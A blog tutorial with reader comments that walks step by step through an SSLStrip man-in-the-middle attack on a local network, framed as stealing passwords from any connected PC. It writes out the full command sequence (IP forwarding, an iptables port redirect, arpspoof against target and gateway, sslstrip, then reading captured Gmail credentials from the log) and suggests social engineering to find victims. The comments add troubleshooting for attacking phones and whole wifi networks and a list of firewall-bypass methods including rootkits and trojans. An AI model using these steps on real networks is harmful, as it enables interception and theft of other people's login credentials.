23


Intro – In this tutorial we will use sslstrip for stealing password from any PC which is connected in LAN. SSLStrip basically hijacks HTTP traffic. Now a days its little difficult to steal password of some website.  

1. How to open
A. GUI Method
Application →Kali Linux → Information gathering → SSL Analysis → sslstrip
                                                                              (click on image for large view)

B. Open terminal type sslstrip –h this command will open sslstrip with help option

Before starting sslstrip we need to do some other works for trapping our target
a.       IP forwarding
b.      IP table for redirect 80 to 8080
c.       Finding Gateway IP
d.      Finding Target IP
e.      Arpspoof

2. This command is used to enable IP forwarding.
Syntax – echo ‘1’ > /proc/sys/net/ipv4/ip_forward

3. This command is use to redirect requests from port 80 to port 8080 to ensure our outgoing connections (from SSL Strip) get routed to the proper port.
Syntax – iptables –t nat –A PREROUTING –p tcp –destination-port 80 –j REDIRECT –to-port 8080

4. This command is used to find out gateway IP.
Syntax – netstat -nr

5. This is our Target OS Windows XP, by using ipconfig we got the target IP. I know you are thinking if I want to trap a unknown LAN PC then how will we find out the IP address. Well its not more difficult some Social engineering can do your job. Come to the point on sslstrip tutorial. So note down the target IP.

6. This command is use to redirect all network HTTP traffic through our computer using ARPSpoof (don’t forget to enable IP forwarding before this)
Syntax – arpspoof –i interface –t target IP –r gateway Ip
Ex – arpspoof –i eth0 –t 192.168.71.128 –r 192.168.71.2

7.  Now we need to open a new terminal because this terminal is running arpspoof and we can’t stop it right now.

8.  In new terminal use this command , This command is used to listening port. "-l" tells the system to listen on specified port.
Syntax – sslstrip –l 8080

9. Now come to the target OS and open www.gmail.com  and enter your username and password than click on sign in. Its normally like we are use for checking our gmail.

10. after clicking sign in on target os come to the attacker PC (Kali Linux). You will see sslstrip capture some data after finishing the capture press ctrl + C for stopping sslstrip. Data automatically save in a file named sslstrip.log.


11. Here use ls command so you can see the saved file as sslstrip.log.

12. use cat and open your sslstrip.log file and watch carefully. Hmm there is your victim email id and password as shown in image.
Syntax – cat sslstrip.log


All in one(do like this)
(click on image for large view)


Like it ? Share it.

Post a Comment

  1. Asking questions are really pleasant thing if you
    are not understanding something fully, but this paragraph offers fastidious understanding even.


    my weblog pc, http://dburl.co/lfoi,

    ReplyDelete
  2. this is very helpful. i have a question, if i wanted the target of the arp spoof to be an iphone, would i just enter the ip address from the iphone as the target ? if so the response i am getting is that aspoof couldnt arp the host. how would i fix this?

    ReplyDelete
    Replies
    1. I always like to discuss in practical things. Sorry to say but i never done practical with iphone so at this time i am unable to say anything. If you can wait I will sure write a tutorial on this in my future post. Because now your issue under my Tutorial LIST. Thanks for comment

      Delete
  3. how do i use this with my network is ipv6.
    Will sslstrip or ssldump ect work with ipv6 if not could you please recommend some programs that will.
    thank you very much sir.

    ReplyDelete
  4. hello how do you configure sslstrip to use ipv6 .
    That is what my network is. If this is not possible can you recommend some programs that do.
    thank you sir.

    ReplyDelete
    Replies
    1. I always say peoples first try than ask it will be good for you as well for me. Your comment sounds you didnt try.

      Delete
  5. My arp works everything works but no data shows up on the ssl terminal is blank
    my trafic is being routed but i get cert warning.
    my card is in promisc mode.
    youre tutorials are amazing i just cant figure out what ime doing wrong.
    mt network settings only shows ipv6.
    i am auditing a mac osX using linux.
    hope i didnt offend.

    ReplyDelete
  6. i think the problem i m having is the listening port.
    every time i use the tutorial everything works .
    my ssl screen shows no info.
    i will try to listen on port 10000.
    thx

    ReplyDelete
  7. Hello,

    sslstrip is only to break the security fo https pages. It replaces the lock icon on the browsers and put the victim directly on http. All the creds appear on the Ettercap terminal.

    ReplyDelete
  8. in step 12, cat command is not displaying anything

    ReplyDelete
    Replies
    1. Kindly verify these step
      1. In the step no 9 when you open website in your target pc. In the address bar website should be start with http://www.gmail.com...... There should be http not https

      2. in step no 11 can you see your saved sslstrip.log

      3, try to open another file with cat so you will be sure that it is not cat problem

      I hope these will help you. Thanks for comment

      Delete
  9. it is no possible copy in the page , you are a shit , bastard. poor

    ReplyDelete
    Replies
    1. Dear Alex nothing is impossible in this world if you have sharp brain... If you want any tutorial in other format you can mail me. Thanks for comment and contact a doctor.

      Delete
  10. Is there any tests that can be done using kali to bypass firewalls on another system?

    ReplyDelete
  11. Roshan, You can bypass firewalls by following methods:
    - IP address spoofing
    - Source routing
    - Tiny fragments
    - Rootkits
    - Trojan
    I will sure discuss about your issue in my upcoming articles. As well i will try to write it in a pdf format because Geekyshows launching E-Books soon and yea its free of cost. Thanks for comment

    ReplyDelete
  12. all are ok... But Some Data Shows Encrypted Format...

    ReplyDelete
  13. Do i have to repeat all steps after rebooting, i am specially asking about
    ip_forward and iptables #Steps.

    ReplyDelete
  14. internet of target machin goes down it shows limited access......plz help

    ReplyDelete
    Replies
    1. We can't blame only one reason for this issue. I like to advice you follow above instruction carefully. Check Target Machine Firewall. You should also try ettercap is it working or not with your target machine so you can recognize your problem in well manners. If you are still facing problem mail me our team will help you to solve your problem

      Delete
  15. good explanation with clear pictures. i hope there is more site like this.

    ReplyDelete
  16. Is it possible to do this to every computer on the entire network? Over wifi? Some tools dont work using wlan0. Is SSLstrip one of them?

    ReplyDelete
  17. this doesnt work if the taret pc uses mozilla or chrome
    shit!!

    ReplyDelete

Comment Rules :
1. Do not post Adult/illegal Links.
2. Try to comment in only English Language.
3. Do not post other website's links which are useless.
4. Your Comment should be based on the Topic for other queries Kindly Visit our Contact Us Page.
5. Do not use Abusive Language.
6. Respect each other.
Thank You for following the rules. Please Comment....

 
Top